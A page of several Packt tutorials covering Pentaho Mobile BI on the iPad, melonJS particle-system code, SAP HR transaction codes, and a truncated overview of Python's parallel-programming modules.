How-To Tutorials


Working with Pentaho Mobile BI

Packt
23 Jun 2014
14 min read
We have always talked about using the Pentaho platform from a mobile device and tried to understand what it really offers. There are some videos on the Internet, but nothing that gives a clear idea of what it is and what we can do with it. We are proud to talk about it (this may be the first article that touches on this topic), and we hope to clear any doubts regarding this platform.

Pentaho Mobile is a web app (see the previous screenshot for the web application's main screen), available only with the Enterprise Edition version of Pentaho, that lets iPad users (and only users on that device) have a rich Pentaho experience on their mobile device. At the time of writing this article, no other mobile platform or device was supported. It lets us interact with the Pentaho system in more or less the same way as we do with Pentaho User Console. The following examples show, in a clear and detailed way, what we can and cannot do with Pentaho Mobile, to help you understand whether accessing Pentaho from a mobile platform could be helpful for your users.

Only for this article, because we are on a mobile device, we will talk about touching (touch) instead of clicking as the action that activates something in the application. With the term touch, we refer to the user's finger gesture instead of the normal mouse click. Different environments have different ways to interact!

The examples in this article assume that you have an iPad device available to try each example and that you are able to successfully log in to Pentaho Mobile. If we want to use demo users, remember that we can use the following logins to access our system:

- admin/password: This is the new Pentaho demo administrator after the famous user, joe (the recognized Pentaho administrator until Pentaho 4.8), was dismissed in this new version.
- suzy/password: This is another simple user we can use to access the system. Because suzy is not a member of the administrator role, it is useful for seeing the difference when a user who is not an administrator tries to use the system.

Accessing BA server from a mobile device

Accessing Pentaho Mobile is as easy as accessing Pentaho User Console. Just open the iPad browser (either Safari or Chrome) and point it to the Pentaho server. This example shows the basics of accessing and logging in to Pentaho from an iPad device through Pentaho Mobile. Remember that this example makes use of Pentaho Mobile, a web app that is available only for iPad and only in the EE version of Pentaho.

Getting ready

To get ready for this example, the only thing we need is an iPad to connect to our Pentaho system.

How to do it…

The following steps detail how simply we can access our Pentaho Mobile application:

1. To connect to Pentaho Mobile, open either Safari or Chrome on the iPad device.
2. As soon as the browser window is ready, type the complete URL of the Pentaho server in the following format: http://<ip_address>:<port>/pentaho
3. Pentaho immediately detects that we are connecting from an iPad device, and the Pentaho Mobile login screen appears. Touch the Login button; the login dialog box appears as shown in the following screenshot.
4. Enter your login credentials and press Login. The Login dialog box closes and we are taken to Pentaho Mobile's home page.

How it works…

Pentaho Mobile has a slightly different look and feel with respect to Pentaho User Console in order to facilitate a mobile user's experience.
The following screenshot shows the landing page we get after we have successfully logged in to Pentaho Mobile. On the left-hand side of Pentaho Mobile's home page, we have the following set of buttons:

- Browse Files: This lets us start navigating the Pentaho Solution Repository.
- Create New Content: This starts Pentaho Analyzer so that we can create a new Analyzer report from the mobile device. Analyzer reports are the only kind of content we can create from the iPad; dashboards and interactive reports can be created only from Pentaho User Console.
- Startup Screen: This lets us change what is displayed as the default startup screen as soon as we log in to Pentaho Mobile.
- Settings: This changes the configuration settings for our Pentaho Mobile application.

To the right of the button list (see the previous screenshot for details), we have three list boxes that display the Recent files we have opened so far, the Favorites files, and the set of Open Files. The Open Files list box is more or less the same as the Opened perspective in Pentaho User Console—it collects all of the opened content in one single place for easy access.

In the upper-right corner of Pentaho Mobile's user interface (see the previous screenshot for details), we have two icons:

- The folder icon gives access, through a different path, to the Pentaho Solution's folders
- The gear icon opens the Settings dialog box

There's more…

Now, let's see which settings we can set or change from the mobile user interface by going to the Settings options.

Changing the Settings configuration in Pentaho Mobile

We can easily access the Settings dialog box either by pressing the Settings button in the left-hand side area of Pentaho Mobile's home page or by pressing the gear icon in the upper-right corner of Pentaho Mobile. The Settings dialog box allows us to easily change the following configuration items (see the following screenshot for details):

- We can set Startup Screen by changing the referenced landing home page for our Pentaho Mobile application.
- In the Recent Files section of the Settings dialog, we can set the maximum number of items allowed in the Recent Files list. The default value is 10, but we can alter it by pressing the related icon buttons.
- Another button, situated immediately below Recent Files, lets us easily empty the Recent Files list box.
- The next two buttons let us clear the Favorites items list (Clear All Favorites) and reset the settings to the default values (Reset All Settings).
- Finally, we have a button that takes us to a help guide and the application's Logout button.

See also

- Look at the Accessing folders and files section to obtain details about how to browse the Pentaho Solution and start new content
- In the Changing the default startup screen section, we will find details about how to change the default Pentaho Mobile session startup screen

Accessing folders and files

From Pentaho Mobile, we can easily access and navigate the Pentaho Solution folders. This example will show how we can navigate the Pentaho Solution folders and start our content on the mobile device. Remember that this example makes use of Pentaho Mobile, a web app available only for iPad and only in the EE version of Pentaho.
How to do it…

The following steps detail how simply we can access the Pentaho Solution folders and start an existing BI content item:

1. From the Pentaho Mobile home page, either touch the Browse Files button located on the left-hand side of the page, or touch the Folder icon button located in the upper-right side of the home page.
2. The Browse Files dialog opens to the right of the Pentaho Mobile user interface, as shown in the following screenshot. Navigate the solution to the folder containing the content we want to start.
3. As soon as we get to the content to start, touch the content's icon to launch it. The content will be displayed in the entire Pentaho Mobile user interface screen.

How it works…

Accessing Pentaho objects from the Pentaho Mobile application is really intuitive. After you have successfully logged in, open the Browse Files dialog and navigate freely through the Pentaho Solution folders' structure to get to your content. To start the content, just touch the content icon and the report or dashboard will be displayed on your iPad. As we can see, at the time of writing this article, we cannot do any administrative tasks (share content, move content, schedule, and other tasks) from the Pentaho Mobile application. We can only navigate to the content, get it, and start it.

There's more…

As soon as we have some content items open, they are shown in the Opened list box. At some point, we may want to close them and free unused memory resources. Let's see how to do this.

Closing opened content

Pentaho Mobile continuously monitors the resource usage of our iPad and warns us as soon as we have a lot of items open. When that happens, a warning dialog box informs us about it, and it is a good opportunity to close some unused (and possibly forgotten) content items. To do this, go to Pentaho Mobile's home page, look for the items to close, and touch the rounded x icon to the right of the content item's label (see the following screenshot for details). The content item will be closed immediately.

Adding files to favorites

As we saw in Pentaho User Console, in the Pentaho Mobile application too we can set our favorites and start accessing content from the favorites list. This section will show how we can do this. Remember that this example makes use of Pentaho Mobile, a web app available only for iPad and only in the EE version of Pentaho.

How to do it…

The following steps detail how simply we can make a content item a favorite:

1. From Pentaho Mobile's home page, either touch the Browse Files button located on the left-hand side of the page or touch the Folder icon button located in the upper-right side of the home page.
2. The Browse Files dialog opens to the right of the Pentaho Mobile user interface. Navigate the solution to the folder containing the content we want as a favorite.
3. Touch the star located to the right-hand side of the content item's label to mark that item as a favorite.

How it works…

It is often useful to define some Pentaho objects as favorites. Favorite items help the user quickly find the report or dashboard to start with. After we have successfully logged in, open the Browse Files dialog and navigate freely through the Pentaho Solution folders' structure to get to your content. To mark the content as a favorite, just touch the star on the right-hand side of the content label and our report or dashboard will be marked as a favorite (see the following screenshot for details).
The favorite status of an item is identified by the following elements:

- The star located to the right-hand side of the item's label gets a bold boundary, showing that the content has been marked as a favorite
- The content appears in the Favorites list box on the Pentaho Mobile home page

There's more…

What should we do if we want to remove the favorite status from our content items? Let's see how we can do this.

Removing an item from the Favorites items list

To remove an item from the Favorites list, we can follow two different approaches:

- Go to the Favorites items list on the Pentaho Mobile home page. Look for the item we want to un-favorite and touch the star icon with the bold boundary located on the right-hand side of the content item's label. The content item will be immediately removed from the Favorites items list.
- Navigate the Pentaho Solution's folders to the location containing the item we want to un-favorite and touch the star icon with the bold boundary located to the right-hand side of the content item's label. The content item will be immediately removed from the Favorites items list.

See also

- Take a look at the Accessing folders and files section in case you want to review how to access content in the Pentaho Solution to mark it as a favorite.

Changing the default startup screen

Imagine that we want to replace the default startup screen with a specific content item we have in our Pentaho Solution. After the new startup screen has been set, the user will, immediately after login, see this new content item opened as the startup screen for Pentaho Mobile instead of the default home page. It would be nice to let our CEO immediately have the company's main KPI dashboard in front of them and react to it right away. This section will show you how to make a specific content item the default startup screen in Pentaho Mobile. Remember that this example makes use of Pentaho Mobile, a web app available only for iPad and only in the EE version of Pentaho.

How to do it…

The following steps detail how simply we can define a new startup screen with an existing BI content item:

1. From the Pentaho Mobile home page, touch the Startup Screen button located on the left-hand side of the home page.
2. The Browse Files dialog opens to the right of the Pentaho Mobile user interface. Navigate the solution to the folder containing the content we want to use.
3. Touch the content item we want to show as the default startup screen.
4. The Browse Files dialog box immediately closes and the Settings dialog box opens. A reference to the newly selected item is shown as the default Startup Screen content item (see the following screenshot for details).
5. Touch outside the Settings dialog to close it.

How it works…

Changing the startup screen can be interesting to give your user access to important content immediately after a successful login. From Pentaho Mobile's home page, touch the Startup Screen button located on the left-hand side of the home page and open the Browse Files dialog. Navigate the solution to the folder containing the content we want and then touch the content item to show as the default startup screen. The Browse Files dialog box immediately closes and the Settings dialog box opens. The newly selected item is shown as the default startup screen content item, referenced by name, together with the complete path to the Pentaho Solution folder.
We can change the startup screen at any time, and we can also reset it to the default Pentaho Mobile home page by touching the Pentaho Default Home radio button.

There's more…

We have always shown pictures of Pentaho Mobile in landscape orientation, but the user interface has a responsive behavior, organizing things differently depending on the orientation of the device.

Pentaho Mobile's responsive behavior

Pentaho Mobile has a responsive layout and changes the display of some of the items on the page we are looking at depending on the device's orientation. The following screenshot gives an idea of how a dashboard is displayed on Pentaho Mobile in portrait orientation. If we look at the home page with the device in portrait mode, the Recent, Favorites, and Opened lists cover the available page width, equally divided between the lists, and all of the buttons that we always saw on the left side of the user interface are relocated to the bottom, below the three lists we have talked about so far. This is another interesting layout; it is up to our taste or viewing needs to decide which of the two is the best option for us.

Summary

In this article, we learned about accessing the BA server from a mobile device, accessing files and folders, adding files to favorites, and changing the default startup screen from a mobile device.

Resources for Article:

Further resources on this subject:
- Getting Started with Pentaho Data Integration [article]
- Integrating Kettle and the Pentaho Suite [article]
- Installing Pentaho Data Integration with MySQL [article]


Implementing Particles with melonJS

Andre Antonio
23 Jun 2014
14 min read
With the popularity of games on smartphones and browsers, 2D gaming is back on the scene, recalling the classic age of the late '80s and early '90s. At that time, most games used animation techniques with images (sprite sheets) to display special effects such as explosions, fire, or magic. In current games, we can use particle systems instead, generating random and interesting visual effects. In this post I will briefly describe what a particle system is and how to implement one using the HTML5 engine melonJS.

Note: Although the examples are specific to the melonJS game engine using JavaScript as a programming language, the concepts and ideas can be adapted to other languages or game engines as well.

Particle systems

A particle system is a technique used to simulate a variety of special visual effects like sparks, dust, smoke, fire, explosions, rain, stars, falling snow, glowing trails, and many others. Basically, a particle system consists of emitters and the particles themselves. The particles are small objects or textures that have different properties, such as:

- Position (x, y)
- Velocity (vx, vy)
- Scale
- Angle
- Transparency (alpha)
- Texture (sprite or color)
- Lifetime

These particles perform some functions associated with their properties (movement, rotation, scaling, change in transparency, and so on) for a period of time, and are removed from the game after this interval (or they are returned to a pool of particles for reuse, ensuring better performance). Depending on how the particle system is implemented, a particle may have some characteristics affected by its lifetime, such as its size or transparency. For example, the older the particle, the sooner it will be removed from the game, and the smaller its size and transparency may become.

The emitter is responsible for launching the particles, acting as a point of origin and working with a group of dozens or hundreds of particles simultaneously. Each emitter has several parameters that determine the characteristics of the particles generated by it. These parameters may include, among others:

- Emission rate of new particles
- Initial position of the particles
- Initial speed of the particles
- Gravity applied to the particles
- Lifetime of the particles

When activated, the emitter manages the number of generated particles and can have different behaviors: it can emit a certain number of particles simultaneously and stop (used in an explosion), or constantly emit particles (used in smoke). It is common for an emitter to allow random value ranges (like the initial position or the lifetime of the particles), creating different and interesting effects each time it is activated, unlike an animation sequence that always exhibits the same effects.

melonJS - a lightweight HTML5 game engine

melonJS (http://melonjs.org/) is an open source engine that uses JavaScript and the HTML5 Canvas element to develop games that can be accessed online via a compatible browser. It has native integration with the Tiled Map Editor (http://www.mapeditor.org/), facilitating the creation of game levels. It also has many features such as a basic physics engine and collision management, animations, support for sprite sheets and texture atlases, tween effects, audio support, a built-in particle system, object pooling, and mouse and touch support, among others. All of these features assist in the development process and the prototyping of games. The engine implements an inheritance mechanism (based on John Resig's Simple Inheritance) allowing any object to be extended.
Several functions and classes are provided to the developer for direct use or for extending with new features. The following is a simple example of engine use with an object of type me.Renderable (the engine's base class for drawing on the canvas):

    game.myRenderable = me.Renderable.extend({
        // constructor
        init : function() {
            // set the object screen position (x, y) = (100, 200); width = 150 and height = 50
            this.parent(new me.Vector2d(100, 200), 150, 50);
            // set the z-order
            this.z = 1;
        },

        // logic - collision, movement, etc
        update : function(dt) {
            return false;
        },

        // draw - canvas
        draw : function(context) {
            // change the canvas context color
            context.fillStyle = '#000';
            // draw a simple rectangle in the canvas
            context.fillRect(this.pos.x, this.pos.y, this.width, this.height);
        }
    });

    // create and add the renderable in the game world
    me.game.world.addChild(new game.myRenderable());

This example draws a rectangle of dimensions (150, 50) at position (100, 200) of the canvas using the color black (#000) as filler.

Single particles with melonJS

Using the classes and functions of melonJS, we can assemble a simple particle system, simulating, for example, drops of water. The following example will emit some particles with an initial vertical velocity (Y axis) that will fall until they leave the screen area of the game, through the gravity mechanism implemented by the physics engine. The example can be accessed online (http://aaschmitz.github.io/melonjs-simple-particles) and the code is available on GitHub (https://github.com/aaschmitz/melonjs-simple-particles).

Simple particle example

The particles will be implemented through a me.Renderable object to draw an image on the canvas, with attributes initialized randomly so that each particle is distinct from the others:

    game.dropletParticle = me.SpriteObject.extend({
        init: function(x, y) {
            // class constructor
            this.parent(x, y, me.loader.getImage("droplet"));

            // update the particle even when off screen
            this.alwaysUpdate = true;

            // calculate random launch angle - convert degrees to radians
            var launch = Number.prototype.degToRad(Number.prototype.random(10, 80));

            // calculate random distance from the original x point
            var distance = Number.prototype.random(3, 5);

            // calculate random altitude from the original y point
            var altitude = Number.prototype.random(10, 12);

            // particle screen side (negative is left, positive is right and zero is center)
            var screenSide = Number.prototype.random(-1, 1);

            // create a new vector and set the initial particle velocity
            this.vel = new me.Vector2d(Math.sin(launch) * distance * screenSide,
                                       -Math.cos(launch) * altitude);

            // set the default engine gravity
            me.sys.gravity = 0.3;
        },

        update: function(dt) {
            // check the particle position against the screen limits
            if ((this.pos.y > 0) && (this.pos.y < me.game.viewport.getHeight()) &&
                (this.pos.x > 0) && (this.pos.x < me.game.viewport.getWidth())) {
                // set the particle position
                this.vel.y += me.sys.gravity;
                this.pos.x += this.vel.x;
                this.pos.y += this.vel.y;
                this.parent(dt);
                return true;
            } else {
                // particle off screen - remove it!
                me.game.world.removeChild(this, true);
                return false;
            }
        }
    });

This code snippet is used as a particle, and the class game.dropletParticle must be initialized with the position (x, y) of the particle on the screen. When the particle is no longer in the visible area of the screen, it will be deleted.
For various particles, we will use a basic emitter, which will be implemented with a normal JavaScript function:

    game.startEmitter = function(x, y, count) {
        // add count particles in the game, all at once!
        for (var i = 0; i < count; i++)
            // add the particle in the game, using the mouse coordinates and z-order = 5
            // use the object pool for better performance!
            me.game.world.addChild(me.pool.pull("droplet", x, y), 5);
    };

This emitter will be called to emit count particles at once using the initial position (x, y). Note that, for best performance, the pooling mechanism of the engine is used in the generation of particles.

Similar to the example described previously, you will find effects of drops and stars implemented in an educational game, Vibrant Recycling. It is available online (http://vibrantrecycling.ciangames.com) and was developed by the author using the melonJS engine:

Single particles in the game Vibrant Recycling

Improved particles through the embedded particle system

For particles with more advanced or complex effects, the previous example proves to be poor, requiring the addition of more attributes to the particles (such as rotation, lifetime, and so on) and a more robust emitter with many different behaviors. Starting from version 1.0.0 of the melonJS engine, a particle system was added to it, facilitating the creation of advanced particles and emitters. The particle system consists of the following classes:

- me.Particle: This is the base class of particles, responsible for movement (using physics), updating the properties, and drawing each individual particle. Its properties are set and adjusted directly by the associated emitter.
- me.ParticleEmitter: This is the class responsible for generating the particles according to the parameters configured on each emitter. It can emit particles with a stream behavior (launches particles sequentially, either indefinitely or for a defined time) or a burst behavior (launches all particles at the same time). For more information, see the official documentation of the engine, available online at http://melonjs.github.io/docs/me.ParticleEmitter.html.
- me.ParticleContainer: This is the class associated with each emitter, which keeps track of all the particles generated by it, updating their logic and removing particles that are outside the viewport or whose lifetime has run out.
- me.ParticleEmitterSettings: This is the object containing the default settings to be used in emitters, allowing you to create many reusable emitter models. Check the allowed parameters in the official documentation of the engine, available online at http://melonjs.github.io/docs/me.ParticleEmitterSettings.html.

To use the particle system with melonJS, do the following:

1. Instantiate an emitter.
2. Adjust the properties of the emitter, or assign a previously created me.ParticleEmitterSettings object to it.
3. Add the emitter and its container to the game.
4. Enable the emitter through the burstParticles() or streamParticles() functions as many times as necessary.
5. At the end of the process, remove the emitter and its container from the game.

The following is a basic example of an emitter that, when enabled, simulates an explosion launching the particles upwards.
Note that the example uses a normal JavaScript function, and each time the function is called, the emitter is created, activated, and destroyed, which is not a good option if the function is executed several times:

    game.makeExplosion = function(x, y) {
        // create a basic emitter at position (x, y) using sprite "explosion"
        var emitter = new me.ParticleEmitter(x, y, me.loader.getImage("explosion"));

        // adjust the emitter properties
        // launch 50 particles
        emitter.totalParticles = 50;
        // particles lifetime between 1s and 3s
        emitter.minLife = 1000;
        emitter.maxLife = 3000;
        // particles have initial velocity between 7 and 13
        emitter.speed = 10;
        emitter.speedVariation = 3;
        // initial launch angle between 70 and 110 degrees
        emitter.angle = Number.prototype.degToRad(90);
        emitter.angleVariation = Number.prototype.degToRad(20);
        // gravity 0.3 and z-order 10
        emitter.gravity = 0.3;
        emitter.z = 10;

        // add the emitter to the game world
        me.game.world.addChild(emitter);
        me.game.world.addChild(emitter.container);

        // launch all particles one time and stop
        emitter.burstParticles();

        // remove emitter from the game world
        me.game.world.removeChild(emitter);
        me.game.world.removeChild(emitter.container);
    };

The example with simple particles described in the previous section will now be implemented using the built-in particle system of the engine. This can be accessed online (http://aaschmitz.github.io/melonjs-improved-particles) and the code is available on GitHub (https://github.com/aaschmitz/melonjs-improved-particles).

    game.explosionManager = Object.extend({
        init: function(x, y) {
            // create a new emitter
            this.emitter = new me.ParticleEmitter(x, y);
            this.emitter.z = 10;

            // start the emitter with pre-defined params
            this.start(x, y);

            // add the emitter to the game
            me.game.world.addChild(this.emitter);
            me.game.world.addChild(this.emitter.container);
        },

        start: function(x, y) {
            // set the emitter params
            this.emitter.image = me.loader.getImage("droplet");
            this.emitter.totalParticles = 20;
            this.emitter.minLife = 2000;
            this.emitter.maxLife = 5000;
            this.emitter.speed = 10;
            this.emitter.speedVariation = 3;
            this.emitter.angle = Number.prototype.degToRad(90);
            this.emitter.angleVariation = Number.prototype.degToRad(20);
            this.emitter.minStartScale = 0.6;
            this.emitter.maxStartScale = 1.0;
            this.emitter.gravity = 0.3;

            // move the emitter
            this.emitter.pos.set(x, y);
        },

        launch: function(x, y) {
            // move the emitter
            this.emitter.pos.set(x, y);

            // launch the particles!
            this.emitter.burstParticles();
        },

        remove: function() {
            // remove the emitter from the game
            me.game.world.removeChild(this.emitter.container);
            me.game.world.removeChild(this.emitter);
        }
    });

Comparing the example using simple particles with the one using the built-in particle system of the engine, we note that the second option is more robust, customizable, and fluid. It provides more realism and refinement in the effects created by the particles.
Improved particle example using the built-in particle system

Visual particles editor

The melonJS engine has a visual particle editor, available online (http://melonjs.github.io/examples/particles/), for creating emitters faster or for making fine adjustments to emitters that have already been created.

melonJS particles editor

The particle editor has a selection menu at the top of the screen, where you can choose between several preset emitters such as fire, smoke, and rain. The right pane of the screen is used to configure (and tune) emitters. The left pane displays the configuration parameters of the emitter currently running, so that they can be added via code to the emitter to be used in the game. You can use the mouse on the indicators in the center of the screen (colored circles) to directly affect some properties of the emitters in a visual way.

Conclusion

The use of a particle system allows the creation of more enjoyable and interesting visual effects through the customization and randomization of the several parameters configured in the emitters, thus creating a greater diversity of generated particles. The melonJS engine proves to be a robust and viable alternative for creating games in HTML5. Being an open source project with a very active team and community, melonJS receives several enhancements and features with each new version, making it easier for game developers to use.

About the author

Andre Antonio Schmitz is a game developer focusing on HTML5 at Cian Games (http://www.ciangames.com). Living in Caxias do Sul, Brazil, he graduated with a Bachelor's degree in Computer Science and has an MBA specialization in IT Management. You can find him on Twitter (https://twitter.com/aaaschmitz), Google+ (https://plus.google.com/+AndreAntonioSchmitz/), or GitHub (https://github.com/aaschmitz).


End User Transactions

Packt
23 Jun 2014
13 min read
An end user transaction code, or simply T-code, is a functionality provided by SAP that calls a new screen to carry out day-to-day operational activities. A transaction code is a four-character command entered in SAP by the end user to perform routine tasks. It can also be a combination of characters and numbers, for example, FS01. Each module has its own uniquely named T-codes. For instance, a FICO module T-code is FI01, while a Project Systems module T-code is CJ20. The T-code, as we will call it throughout the article, is a technical name that is entered in the command field to initiate a new GUI window. In this article, we will cover all the important T-codes that end users or administrators use on a daily basis. Further, you will also learn more about the standard reports that SAP has delivered to ease daily activities.

Daily transactional codes

On a daily basis, an end user needs to access T-codes to perform daily transactions. All T-codes are entered in a command field. A command field is a space designed by SAP for entering T-codes. There are multiple ways to enter a T-code; we will gradually learn about the different approaches.

The first approach is to enter the T-code in the command field, as shown in the following screenshot.

Second, T-codes can be accessed via SAP Easy Access. By double-clicking on a node, the associated application is called and the "start of application" message is shown at the bottom of the screen. SAP Easy Access is the first screen you see when you log on. The following screenshot shows the SAP Easy Access window.

We don't have to remember any T-codes. SAP provides a functionality to store T-codes by adding them under Favorites. To add a T-code to Favorites, navigate to Favorites | Insert transaction, as shown in the following screenshot, or simply press Ctrl + Shift + F4 and then enter the T-code that we wish to add as a favorite.

There are different ways to call a technical screen using a T-code. They are shown in the following list:

/n+T-code (for example, /nPA20): If we wish to call the technical screen in the same session, we may use the /n+T-code function.
/o+T-code (for example, /oFS01): If we wish to call the screen in a different session, we may use the /o+T-code function.

Frequently used T-codes

Let's look closely at the important or frequently used T-codes for administration or transactional purposes.

The Recruitment submodule

The following are the essential T-codes in the Recruitment submodule:

PB10: This T-code is used for initial data entry. It performs actions similar to the PB40 T-code. The mandatory fields ought to be filled by the user to proceed to the next infotype.
PB20: This T-code is used for display purposes only.
PB30: This T-code is used to make changes to an applicant's data, for example, changing a wrongly entered date of birth or an incorrect address.
PBA1: This T-code provides the functionality to bulk process applicants' data. Multiple applicants can be processed at the same time, unlike the PB30 T-code, which processes every applicant's data individually. Applicants' IDs along with their names are fetched using this T-code for easy processing.
PBA2: This T-code is useful when listing applicants based on their advertising medium for bulk processing. It helps to filter applicants based on a particular advertising channel such as a portal.
PBAW: This T-code is used to maintain the advertisements used by the client to process applicants' data.
PBAY: All the vacant positions can be listed using this T-code. If positions are not flagged as vacant in the Organizational Management (OM) submodule, they can be maintained via this T-code.
PBAA: A recruitment medium, such as a job portal site, that is linked with an advertisement medium is evaluated using this T-code.
PBA7: This is an important T-code used to transfer an applicant to an employee. The applicant gets converted to an employee using this T-code. This is where the integration between the Recruitment and Personnel Administration submodules comes into the picture.
PBA8: To confirm whether an applicant has been transferred to an employee, PBA8 needs to be executed. The system displays a message that processing has been carried out successfully for the applicants.

After the PBA8 T-code is executed, we will see a message similar to the one shown in the following screenshot.

The Organization Management submodule

We will cover some of the important T-codes used to design and develop the organization structure in the following list:

PPOCE: This T-code is used to create an organizational structure. It is a graphically supported interface with icons to easily differentiate between object types such as org unit and position.
PPOC_OLD: SAP provides multiple interfaces to create a structure. This T-code is one such interface that is pretty simple and easy to use.
PP01: This is also referred to as the Expert Mode, because one needs to know the object types, such as SPOCK (where S represents position, O represents organization unit, and so on), and the relationships A/B (where A is the bottom-up approach and B is the top-down approach) in depth to work in this interface.
PO10: This T-code is used to build structures using object types individually, based on SPOCK. It is used to create an org unit; this T-code creates the object type O, organization unit.
PO13: This is used to create the position object type.
PO03: This T-code is used to create the job object type.
PP03: This is an action-based T-code that helps infotypes get populated one after another. All of the infotypes, such as 1000-Object, 1001-Relationships, and 1002-Description, can be created using this interface.
PO14: Tasks, which are the day-to-day activities performed by the personnel, can be maintained using this T-code.

The Personnel Administration submodule

The Personnel Administration submodule deals with everything related to the master data of employees. Some of the frequently used T-codes are listed as follows:

PA20: The master data of an employee is displayed using this T-code.
PA30: The master data is maintained via this T-code. Employee details such as address and date of birth can be edited using this T-code.
PA40: Personnel actions are performed using this T-code. Personnel actions such as hiring and promotion, known as action types, are executed for employees.
PA42: This T-code, known as the fast entry for actions solution, helps a company maintain a large amount of data. The information captured using this solution is highly accurate.
PA70: This T-code, known as the fast entry functionality, allows the maintenance of master data for multiple employees at the same time. For example, the Recurring Payments and Deductions (0014) infotype can be maintained for multiple employees.

The usage of the PA70 T-code is shown in the following screenshot.
Multiple employees can be entered, and the corresponding wage type, amount, currency, and so on can be provided for these employees. Using this functionality saves the administrator's time.

The Time Management submodule

The Time Management submodule is used to capture the time an employee has spent at their workplace or to make a note of their absenteeism. The important T-codes that maintain time data are covered in the following list:

PT01: The work schedule of the employee is created using this T-code. The work schedule is simply the duration of work, say, for instance, 9 a.m. to 6 p.m.
PTMW: The Time Manager's Workplace allows us to have multiple views, such as a one-day view and a multiday view. It is used to administer and manage time.
PP61: This T-code is used to change a shift plan for the employee.
PA61: This T-code, known as maintain time data, is used to maintain time data for employees. Only time-related infotypes such as Absences, Attendances, and Overtime are maintained via this T-code.
PA71: This T-code, known as the fast entry of time data action, is used to capture time-related data for multiple employees.
PT50: This T-code, known as quota overview, is used to display the quota entitlements and leave balances of an employee.
PT62: The attendance check T-code is used to create a list of employees who are absent, along with their reasons and the attendance time.
PT60: This T-code is used for time evaluation. It runs a program that evaluates the time data of employees. Wage types are also processed using this program.
PT_ERL00: Time evaluation messages are displayed using this T-code.
PT_CLSTB2: Time evaluation results can be accessed via this T-code.
CAC1: Using this T-code, a data entry profile is created. Data entry profiles are maintained for employees to capture their daily working hours, absences, and so on.
CATA: This T-code is used to transfer data to target components such as PS, HR, and CO.

The Payroll Accounting submodule

The gross and net calculations of wages are performed using this submodule. We will cover all the important T-codes that are used on a daily basis in the following list:

PU03: This T-code can be used to change the payroll status of an employee if necessary. It lets us change master data that already exists, for example, locking a personnel number. One must exercise caution when working with this T-code; it is a sensitive T-code because it is related to an employee's pay. Time data for the employee is also controlled using this T-code.
PA03: The control record is accessed via this T-code. The control record holds the key characteristics of how a payroll is processed. This T-code is normally not authorized for administrators.
PC00_MXX_SIMU: This T-code is used for the simulation run of a payroll. The test flag is automatically set when this T-code is executed.
PC00_MXX_CALC: A live payroll run can be performed using this T-code. The test flag is still available to be used if required.
PC00_MXX_PA03_RELEA: This T-code is normally used by end users to release the control record. Master data and time data are locked when this T-code is executed, so changes cannot be made.
PC00_MXX_PA03_CORR: This T-code is used to make any changes to the master data or time data. The status has to be reverted to "release" to run a payroll for the payroll period.
PC00_MXX_PA03_END: Once all the activities are performed for the payroll period, the control record must be exited in order to proceed to the subsequent periods.
PC00_MXX_CEDT: The remuneration statement, or payslip, can be displayed using this T-code.
PE51: The payslip is designed using this T-code. The payments, deductions, and net pay sections can be designed using this T-code.
PC00_MXX_CDTA: The data medium exchange for banks can be achieved using this tool.
PUOC_99: The off-cycle payroll, or on-demand payroll as it is called in SAP, is used to make payments or deductions in a nonregular pay period, such as in the middle of the payroll period.
PC00_M99_CIPE: The payroll results are posted to the finance department using this T-code.
PCP0: The payroll posting runs are displayed using this T-code. The release of posting documents is controlled using this T-code.
PC00_M99_CIPC: The completeness check is performed using this T-code. We can find the pay results that have not been posted using this T-code.
OH11/PU30: The wage type maintenance tool is useful when creating wage types or pay components such as housing and dearness allowance.
PE01: The schema, which is the warehouse of payroll logic, is accessed and/or maintained via this T-code.
PE02: The Personnel Calculation Rule (PCR) is accessed via this T-code. The PCR is used to perform small calculations.
PE04: The functions and operations used in payroll can be accessed via this T-code. The documentation of most of these functions and operations can also be accessed via this T-code.
PC00_M99_DLGA20: This shows the wage types used and their processing class and cumulation class assignments. The wage types used in a payroll are analyzed using this T-code.
PC00_M99_DKON: The wage types mapped to general ledgers for FICO integration can be analyzed using this T-code.
PCXX: Country-specific payroll can be accessed via this T-code.
PC00: Payroll for all countries, such as those in Europe, the Americas, and so on, can be accessed via this T-code.
PC_Payresult: The payroll results of an employee can be analyzed via this T-code. The following screenshot shows how the payroll results are displayed when the T-code is executed.

The "XX" part in PCXX denotes the country grouping. For example, it is 10 for the USA, 01 for Germany, and so on. SAP has localized country-specific payroll solutions, and hence, each country has a specific number. The country-specific settings are enabled using MOLGA, which is a technical name for the country, and it needs to be activated; it is the foundation of the SAP HCM solution. The country grouping is always 99 for an off-cycle run, and the same applies to posting.

The following screenshot shows the output of the PC_Payresult T-code.

The Talent Management submodule

The Talent Management submodule deals with assessing the performance of employees, such as collecting feedback from supervisors, peers, and so on. We will explore the T-codes used in this submodule in the following list:

PHAP_CATALOG: This is used to create an appraisal template that can be filled in by the respective persons, based on Key Result Areas (KRAs) such as attendance, certification, and performance.
PPEM: Career and succession planning for an entire org unit can be performed via this T-code.
PPCP: Career planning for a person can be performed via this T-code. The qualifications and preferences can be checked, based on which suitable persons can be shortlisted.
PPSP: Succession planning can be performed via this T-code. The successor for a particular position can be determined using this T-code.
Different object types, such as position and job, can be used to plan the successor.

OOB1: The appraisal forms are accessed via this T-code. The possible combinations of appraiser and appraisee are determined based on the evaluation path.
APPSEARCH: This T-code is used to evaluate appraisal templates based on different statuses such as "in preparation" and "completed".
PHAP_CATALOG_PA: This is used to create an appraisal template that can be filled in by the respective persons based on KRAs such as attendance, certification, and performance. The allowed appraisers and appraisees can be defined.
OOHAP_SETTINGS_PA: The integration check-related switches can be accessed via this T-code.
APPCREATE: Once the created appraisal template is released, we will be able to find the template via this T-code.


Discovering Python's parallel programming tools

Packt
20 Jun 2014
3 min read
The Python threading module

The Python threading module offers a layer of abstraction over the lower-level _thread module. It provides functions that help the programmer during the hard task of developing parallel systems based on threads. The threading module's official documentation can be found at http://docs.python.org/3/library/threading.html?highlight=threading#module-threading.

The Python multiprocessing module

The multiprocessing module aims at providing a simple API for the use of parallelism based on processes. Its API is similar to that of the threading module, which makes switching between the two approaches straightforward. The process-based approach is very popular within the Python users' community, as it offers an alternative for CPU-bound work in the presence of the GIL in Python. The multiprocessing module's official documentation can be found at http://docs.python.org/3/library/multiprocessing.html?highlight=multiprocessing#multiprocessing.

The parallel Python module

The parallel Python module is external and offers a rich API for the creation of parallel and distributed systems based on the process approach. This module promises to be light and easy to install, and to integrate with other Python programs. The parallel Python module can be found at http://parallelpython.com. Among its features, we may highlight the following:

- Automatic detection of the optimal configuration
